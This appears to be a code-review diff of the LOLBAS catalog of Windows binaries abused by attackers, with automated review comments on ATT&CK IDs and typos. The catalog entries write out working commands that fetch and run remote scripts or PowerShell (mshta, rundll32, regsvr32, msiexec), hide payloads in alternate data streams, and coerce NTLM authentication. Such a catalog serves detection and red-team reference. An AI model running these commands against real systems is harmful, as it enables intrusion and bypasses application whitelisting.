|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) | ||||
|     Description: Executes VBScript supplied as a command line argument. | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     MitreID: T1218.005 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); | ||||
|     Description: Executes JavaScript supplied as a command line argument. | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     MitreID: T1218.005 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: mshta.exe "C:\ads\file.txt:file.hta" | ||||
|     Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. | ||||
|     Usecase: Execute code hidden in alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     MitreID: T1218.005 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\mshta.exe | ||||
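Review bot: the second mshta command uses a defanged URL (`https[:]//webserver/payload[.]sct`) while the next command carries a live `https://raw.githubusercontent.com/...` URL; a defanged string inside a `Command:` field fails if pasted, so be consistent and use the plain form, as the rest of the catalog does.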
|   | ||||
| @@ -9,32 +9,28 @@ Commands: | ||||
|     Usecase: Execute custom made msi file with attack code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     MitreID: T1218.007 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png | ||||
|     Description: Installs the target remote & renamed .MSI file silently. | ||||
|     Usecase: Execute custom made msi file with attack code from remote server | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     MitreID: T1218.007 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msiexec /y "C:\folder\evil.dll" | ||||
|     Description: Calls DLLRegisterServer to register the target DLL. | ||||
|     Usecase: Execute dll files | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     MitreID: T1218.007 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msiexec /z "C:\folder\evil.dll" | ||||
|     Description: Calls DLLRegisterServer to un-register the target DLL. | ||||
|     Usecase: Execute dll files | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     MitreID: T1218.007 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\msiexec.exe | ||||
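Review bot: the `msiexec /z "C:\folder\evil.dll"` description says it calls DLLRegisterServer, but `/z` invokes DllUnregisterServer (`/y` is the DllRegisterServer case in the entry above); fix the description. `DLLRegisterServer` should also be spelled `DllRegisterServer` in both entries. The move from T1218 to T1218.007 (Msiexec) is correct.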
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Proxy execution of .dll | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1128 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1128/ | ||||
|     MitreID: T1546.007 | ||||
|     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\WINDOWS\System32\Netsh.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: odbcconf /a {REGSVR c:\test\test.dll} | ||||
|     Description: Execute DllREgisterServer from DLL specified. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\odbcconf.exe | ||||
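Review bot: ATT&CK has sub-technique T1218.008 (Odbcconf) for exactly these odbcconf executions, yet both entries keep the parent `MitreID: T1218` while this sprint moves msiexec, mshta and mmc to their sub-techniques; change both to T1218.008. While here, `DllREgisterServer` in the description above should read `DllRegisterServer`.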
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: '%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe' | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: pcalua.exe -a \\server\payload.dll | ||||
|     Description: Open the target .DLL file with the Program Compatibilty Assistant. | ||||
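Review bot: `Program Compatibilty Assistant` in the pcalua .DLL description is a typo for `Compatibility` (the .CPL entry below spells it correctly).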
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java | ||||
|     Description: Open the target .CPL file with the Program Compatibility Assistant. | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\pcalua.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\pcwrun.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Reconnaissance | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1040 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1040 | ||||
|     OperatingSystem: Windows 10 1809 and later | ||||
|   - Command: pktmon.exe filter add -p 445 | ||||
|     Description: Select Desired ports for packet capture | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Reconnaissance | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1040 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1040 | ||||
|     OperatingSystem: Windows 10 1809 and later | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\pktmon.exe | ||||
|   | ||||
| @@ -1,23 +1,22 @@ | ||||
| --- | ||||
| Name: Pnputil.exe | ||||
| Description: used for Install drivers. | ||||
| Description: Used for installing drivers | ||||
| Author: Hai vaknin (lux) | ||||
| Created: 25/12/2020 | ||||
| Created: 2020-12-25 | ||||
| Commands: | ||||
|   - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf | ||||
|     Description: used for Install drivers | ||||
|     Usecase: add malicious driver. | ||||
|     Description: Used for installing drivers | ||||
|     Usecase: Aadd malicious driver | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1215 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1215 | ||||
|     OperatingSystem: Windows 10,7  | ||||
|     MitreID: T1547.006 | ||||
|     OperatingSystem: Windows 10,7 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\system32\pnputil.exe | ||||
| Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf | ||||
| Acknowledgement: | ||||
|   - Person: Hai Vaknin(Lux)  | ||||
|     Handle: 'LuxNoBulIshit' | ||||
|   - Person: Hai Vaknin(Lux) | ||||
|     Handle: '@LuxNoBulIshit' | ||||
|   - Person: Avihay eldad | ||||
|     Handle: 'aloneliassaf' | ||||
|     Handle: '@aloneliassaf' | ||||
| --- | ||||
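Review bot: this rewrite introduces a new typo, `Usecase: Aadd malicious driver`; it should read `Add malicious driver`. `Code_Sample:` is also left as a bare URL here, whereas the other files in this sprint use a `- Code:` list item, so the field will not render like the rest of the catalog. The date normalisation to `2020-12-25` and the `@` prefixes on the handles are good.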
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Presentationhost.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe | ||||
|     Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe | ||||
|     Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. | ||||
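Review bot: `MitreID: T1105` on the local `print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe` entry is questionable; T1105 (Ingress Tool Transfer) covers bringing files in from an external system, which the `\\WebDavServer\Folder\File.exe` variant in the next hunk does, but a local-to-local copy does not, so decide whether this entry needs a different technique ID or none.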
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\print.exe | ||||
|   | ||||
| @@ -10,15 +10,13 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105/ | ||||
|     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder | ||||
|     Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder | ||||
|     Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1096/ | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\spool\tools\PrintBrm.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Reconnaissance | ||||
|     Privileges: User | ||||
|     MitreID: T1113 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1113/ | ||||
|     OperatingSystem: since Windows 7 (client) / Windows 2008 R2 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\psr.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User, Administrator in Windows 8 | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\rasautou.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Hide/plant registry information in Alternate data stream for later use | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\reg.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Execute code and bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: Local Admin | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     MitreID: T1218.009 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regasm.exe /U AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the UnRegisterClass function. | ||||
|     Usecase: Execute code and bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     MitreID: T1218.009 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe | ||||
| @@ -32,7 +30,7 @@ Detection: | ||||
| Resources: | ||||
|   - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Hide registry data in alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regedit C:\ads\file.txt:regfile.reg | ||||
|     Description: Import the target .REG file into the Registry. | ||||
|     Usecase: Import hidden registry data from alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\regedit.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Write to registry | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\regini.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Register-cimprovider.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Execute dll file and bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: Local Admin | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     MitreID: T1218.009 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvcs.exe AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute dll file and bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: Local Admin | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     MitreID: T1218.009 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\regsvcs.exe | ||||
| @@ -30,7 +28,7 @@ Detection: | ||||
| Resources: | ||||
|   - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
|   | ||||
| @@ -9,32 +9,28 @@ Commands: | ||||
|     Usecase: Execute code from remote scriptlet, bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     MitreID: T1218.010 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll | ||||
|     Description: Execute the specified local .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from scriptlet, bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     MitreID: T1218.010 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
|     Description: Execute the specified remote .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from remote scriptlet, bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     MitreID: T1218.010 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll | ||||
|     Description: Execute the specified local .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from scriptlet, bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     MitreID: T1218.010 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\regsvr32.exe | ||||
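Review bot: the two `regsvr32.exe /s /u /i:file.sct scrobj.dll` entries in this hunk are identical in Command, Description and Usecase and differ only in `Category:` (AWL bypass vs Execute), and judging by the Usecase lines the same holds for the two remote `/i:http://example.com/file.sct` entries. Now that all four carry T1218.010, this is the moment to decide whether the project wants one entry per category or a single entry with both categories, and to record the choice in the commit message. The T1117 to T1218.010 mapping itself is correct.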
| @@ -47,7 +43,7 @@ Detection: | ||||
| Resources: | ||||
|   - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A | ||||
|     Description: Download/Copy bar.exe to outdir | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\replace.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Credentials | ||||
|     Privileges: User | ||||
|     MitreID: T1003 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM | ||||
|     Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set). | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Credentials | ||||
|     Privileges: User | ||||
|     MitreID: T1187 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1187/ | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\rpcping.exe | ||||
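Review bot: the two rpcping commands keep different ids, T1003 for the first and T1187 for the `/a connect /u NTLM` one, although both sit under `Category: Credentials` and the visible description is about triggering an authenticated RPC call that could be relayed. T1187 (Forced Authentication) is the technique that describes coercing an NTLM authentication; T1003 (OS Credential Dumping) does not describe either command. Suggest aligning both on T1187 as part of this sprint, or explaining in the commit message why the first one is different.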
|   | ||||
| @@ -9,64 +9,56 @@ Commands: | ||||
|     Usecase: Execute dll file | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint | ||||
|     Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. | ||||
|     Usecase: Execute DLL from SMB share. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. | ||||
|     Usecase: Execute code from Internet | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. | ||||
|     Usecase: Proxy execution | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. | ||||
|     Usecase: Proxy execution | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. | ||||
|     Usecase: Execute code from Internet | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain | ||||
|     Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). | ||||
|     Usecase: Execute code from alternate data stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe -sta {CLSID} | ||||
|     Description: Use Rundll32.exe to load a registered or hijacked COM Server payload.  Also works with ProgID. | ||||
|     Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: | ||||
|     MitreLink: | ||||
|     MitreID: T1218.011 | ||||
|     OperatingSystem: Windows 10 (and likely previous versions) | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\rundll32.exe | ||||
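Review bot: the `rundll32.exe -sta {CLSID}` entry at the end of this hunk previously had empty `MitreID:` and `MitreLink:` fields and is now assigned T1218.011; that is a new attribution rather than a renumbering of an existing one, so it deserves a line in the commit message. While the block is being edited, the `Description:` context line for that entry has a double space after "payload." that could be fixed in the same pass.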
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
